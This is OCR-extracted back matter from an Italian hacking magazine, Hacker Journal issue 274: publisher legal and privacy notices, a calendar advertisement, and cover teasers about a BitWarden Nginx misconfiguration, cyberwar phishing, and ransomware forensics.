La Sprea S.p.A. è titolare esclusiva della testata Hacker journal e di tutti i diritti di pubblicazio- art. 13 D.Lgs. 196/03 e 13 GDPR Reg. UE 679/2016e l’invio dei Suoi dati personali alla Sprea
SERVIZIO QUALITÀ EDICOLANTI E DL ne e diffusione in Italia. L’utilizzo da parte di terzi di testi, fotografie e disegni, anche parziale, varrà quale consenso espresso al trattamento dei dati personali secondo quanto sopra
Sonia Lancellotti, Luca Majocchi: Tel. 02 92432295 è vietato. L’Editore si dichiara pienamente disponibile a valutare – e se del caso regolare – le specificato. L’invio di materiale (testi, fotografie, disegni, etc.) alla Sprea S.p.A. deve inten-
distribuzione@sprea.it 351 5582739 eventuali spettanze di terzi per la pubblicazione di immagini di cui non sia stato eventualmente dersi quale espressa autorizzazione alla loro libera utilizzazione da parte di Sprea S.p.A. Per
possibile reperire la fonte. Informativa e Consenso in materia di trattamento dei dati personali qualsiasi fine e a titolo gratuito, e comunque, a titolo di esempio, alla pubblicazione gratuita su
GDPR Reg. UE 679/2016 e del Codice Privacy d.lgs. 196/03 cosi come modificato dalle disposi- qualsiasi supporto cartaceo e non, su qualsiasi pubblicazione (anche non della Sprea S.p.A.),
ABBONAMENTI E ARRETRATI zioni di adeguamento alla Legge Italiana D.Lgs 101/2018. Nel vigore del GDPR Reg. UE 679/2016 in qualsiasi canale di vendita e Paese del mondo.
Abbonamenti: si sottoscrivono on-line su www.sprea.it/hackerjournal e del Codice Privacy d.lgs. 196/03 cosi come modificato dalle disposizioni di adeguamento alla
abbonamenti@sprea.it Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00) Legge Italiana D.Lgs 101/2018. artt. 24 e 25, è Sprea S.p.A. (di seguito anche “Sprea”), con Il materiale inviato alla redazione non potrà essere restituito.
REGALA (O REGALATI!)
UN CALENDARIO
Per appuntare impegni, Della stessa collana:
visite mediche, CALENDARI-AGENDA
compleanni, eventi... formato LONG

Tutto quello che ti serve


sempre sotto ai tuoi occhi!

INQUADRA
IL QR CODE
E SCOPRI
TUTTI I TITOLI!

VERSIONE
SPECIALE
CALENDAR
IO CARTACE
O
LAVAGNETTA+
MAGNETICA
A SOLI
9,90 €

GENNAIO 2024 Simone Emma


Carlo Elena

Chitarra
Appuntamento ore 17:00
1 alle poste

2
ma
PortarenoEnmni
3 dai

Riunione
di condominio
4 ore 19:30

Disponibili sullo store online e in edicola!


Telefono online email WhatsApp
02 87168197 www.sprea.it/calendari abbonamenti@sprea.it 329 3922420
Solo messaggi
O PUBBLICITÀ
100% INDIPENDENTE! N

Tutto quello
che gli altri
non osano dirti!

IN QUESTO N U M E RO
VULNERABILITÀ | Il portachiavi in bella mostra
Un bug nella configurazione di Nginx per BitWarden, il noto gestore
di password, permette a un hacker di sferrare un attacco brute force

CYBERGUERRA | Phishing e defacing


Queste tipologie di attacco rientrano tra quelle più adoperate nella cyberguerra
Russia-Ucraina. Il loro scopo è quello di fare incetta di dati personali

WHAT IS | Ransomware Forensics: cos’è e come funziona


È l’analisi di un attacco che consente di raccogliere le prove digitali
per meglio capire come si è verificata una violazione. Ma quando si usa?

HACKULTURE | Il lato “sonoro” dell’hacking


Come l’hacker si immerge nel codice, così il musicista naviga tra note
e frequenze. In entrambi i casi l’obiettivo è manipolare, scoprire e, infine, creare!

NUMERO 274 • Bimestrale • 3.90 €

P.I. 7-11-2023 NOVEMBRE/DICEMBRE

Prezzi esteri: AUT € 7,50 - BE € 7,00 - LUX € 6,50 - F+PM € 9,50 FR + € 10,50 PM - ES € 6,00 - PT (Cont.) € 5,50 - CH Tedesca CHF 8,3 - CH Ticino CHF 7,3 - OLANDA € 7,50

Potrebbero piacerti anche